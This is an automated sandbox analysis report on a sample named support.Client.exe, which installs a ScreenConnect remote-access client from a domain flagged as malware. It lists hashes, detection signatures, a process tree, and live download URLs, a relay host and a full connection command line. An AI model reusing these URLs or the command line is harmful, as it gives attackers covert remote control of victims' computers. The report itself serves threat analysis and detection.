Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
support.Client.exe

Overview

General Information

Sample name:support.Client.exe
Analysis ID:1663841
MD5:944760eef8a88f6cfa16fd094df736da
SHA1:6588e21955be01f673927365a56ef783dfd2575c
SHA256:f586b105e8fc1e49a796179e8a6a76912787c30fc3716e98650b096dcf31d8ea
Infos:

Detection

ScreenConnect Tool
Score:63
Range:0 - 100
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Joe Sandbox ML detected suspicious sample
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

Process Tree

  • System is w11x64_office
  • support.Client.exe (PID: 964 cmdline: "C:\Users\user\Desktop\support.Client.exe" MD5: 944760EEF8A88F6CFA16FD094DF736DA)
    • dfsvc.exe (PID: 2084 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: 4F6DD827B5F1F532A6AAF1316615DB29)
      • ScreenConnect.WindowsClient.exe (PID: 6324 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" MD5: AFA993C978BC52D51E8AF08A02892B4E)
        • ScreenConnect.ClientService.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
    • WerFault.exe (PID: 3400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 800 MD5: AA47AAA34035C6EB09F8ACA062E66C9D)
  • svchost.exe (PID: 2384 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 8EC922C7A58A8701AB481B7BE9644536)
    • WerFault.exe (PID: 3160 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 964 -ip 964 MD5: AA47AAA34035C6EB09F8ACA062E66C9D)
      • conhost.exe (PID: 3304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
  • svchost.exe (PID: 6116 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc MD5: 8EC922C7A58A8701AB481B7BE9644536)
  • svchost.exe (PID: 3604 cmdline: C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc MD5: 8EC922C7A58A8701AB481B7BE9644536)
  • svchost.exe (PID: 6176 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WFDSConMgrSvc MD5: 8EC922C7A58A8701AB481B7BE9644536)
  • ScreenConnect.ClientService.exe (PID: 6384 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1" MD5: D3E628C507DC331BAB3DE1178088C978)
    • ScreenConnect.WindowsClient.exe (PID: 6440 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "9515c91f-1be5-4b93-b357-5a2d77e27f0d" "User" MD5: AFA993C978BC52D51E8AF08A02892B4E)
    • ScreenConnect.WindowsClient.exe (PID: 6540 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "67690a9d-de46-40e6-b1a1-8264d8889408" "System" MD5: AFA993C978BC52D51E8AF08A02892B4E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000002.3936944841.000001C1FEF44000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        0000000F.00000002.3152147048.000000001B2EF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            0000000F.00000002.3150883243.0000000002A10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000002.00000002.3921451450.000001C1E3F04000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 3 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
                Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 60842, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 2084, Protocol: tcp, SourceIp: 104.21.48.239, SourceIsIpv6: false, SourcePort: 443
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 712, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 2384, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.manifest(Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configQfgAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application6.VGOqAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Core.dllAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exeAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.ClieAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.ClientService.dllAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsCAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20SessionAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Windows.dllAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe2Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationicationAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exeLAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configGfiAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application.exeAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.ClientService.dlllAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.ClientService.exeHLAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application8Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exeAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeAvira URL Cloud: Label: malware
                Source: https://web.updhelp.topAvira URL Cloud: Label: malware
                Source: http://web.updhelp.topAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeUAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application089I8Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGOAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.dllAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.manifestiAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application_Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.manifestAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.eAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.topAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.ClientSeAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.manifestYAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.config_Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationPAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.ClientService.exeAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageShell.exXAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationLW6.VGOjAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Client.applicationdb01kAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManag(Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.Avira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsBackstageAvira URL Cloud: Label: malware
                Source: https://web.updhelp.top/Bin/ScreenConnect.WindowsClient.exe.configAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: support.Client.exeReversingLabs: Detection: 26%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleNeural Call Log Analysis: 93.4%
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior

                Compliance

                barindex
                EXE planting / hijacking vulnerabilities found
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.ClientService.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsFileManager.exeJump to behavior
                Uses 32bit PE files
                Source: support.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                PE / OLE file has a valid certificate
                Source: support.Client.exeStatic PE information: certificate valid
                Contains modern PE file flags such as dynamic base (ASLR) or NX
                Source: support.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Binary contains paths to debug symbols
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: support.Client.exe
                Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D41000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E40F9000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000010.00000002.3148495493.0000000001832000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe, 00000012.00000002.4166697871.0000000002761000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.4164882713.0000000002C60000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000013.00000002.4165858393.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000010.00000000.3144357412.0000000000BAD000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E40FD000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D45000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3152789867.000000001B8E2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000F.00000000.3138042328.0000000000502000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D35000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150615596.0000000000DF2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D35000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000F.00000002.3150615596.0000000000DF2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E4115000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E40F3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D3D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000010.00000002.3149043618.00000000056C2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\

                Networking

                barindex
                Enables network access during safeboot for specific services
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                Source: global trafficTCP traffic: 192.168.2.24:60861 -> 217.156.123.36:8880
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzip
                Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: web.updhelp.topAccept-Encoding: gzipConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
